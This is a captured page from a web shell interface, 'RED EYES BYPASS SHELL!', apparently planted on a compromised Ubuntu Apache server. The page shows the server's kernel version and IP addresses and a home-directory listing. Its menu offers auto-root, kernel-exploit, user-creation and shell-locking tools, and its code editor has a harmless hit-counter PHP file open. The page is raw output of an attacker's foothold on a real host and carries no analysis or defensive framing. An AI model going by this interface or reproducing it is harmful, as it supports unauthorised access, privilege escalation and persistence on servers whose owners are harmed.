Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lcir /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
css
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
static
[ DIR ]
drwxr-xr-x
tt
[ DIR ]
drwxr-xr-x
.bash_logout
220
B
-rwxr-xr-x
.bashrc
3.68
KB
-rwxr-xr-x
.profile
807
B
-rwxr-xr-x
countlogx.txt
3
B
-rwxr-xr-x
favicon.ico
318
B
-rwxr-xr-x
index.php
23.18
KB
-rwxr-xr-x
index1.html
429.66
KB
-rwxr-xr-x
index2.php
676
B
-rwxr-xr-x
siteCount.php
1.13
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : siteCount.php
<?php ini_set('display_errors', 1); ini_set('display_startup_errors', 1); error_reporting(E_ALL); // Add correct path to your countlog.txt file. //$path = 'countlog.txt'; $path = 'tt/countlog.txt'; /* $myfile = fopen("testfile.txt", "w"); if (file_exists($path)) { echo "have file"; } else { $myfile = fopen($path, "w"); $txt = "500"; fwrite($myfile, $txt); fclose($myfile); } echo fileperms($path); $info = ''; $perms = fileperms($path); switch ($perms & 0xF000) { case 0xC000: // socket $info = 's'; break; case 0xA000: // symbolic link $info = 'l'; break; case 0x8000: // regular $info = 'r'; break; default: // unknown $info = 'u'; } echo '--' . $info; */ // Opens countlog.txt to read the number of hits. $file = fopen( $path, 'r' ); $count = fgets( $file, 1000 ); fclose( $file ); // Update the count. $count = abs( intval( $count ) ) + 1; // Output the updated count. //echo "{$count} hits\n"; // Opens countlog.txt to change new hit number. $file = fopen( $path, 'w' ); fwrite( $file, $count ); fclose( $file ); ?>
Close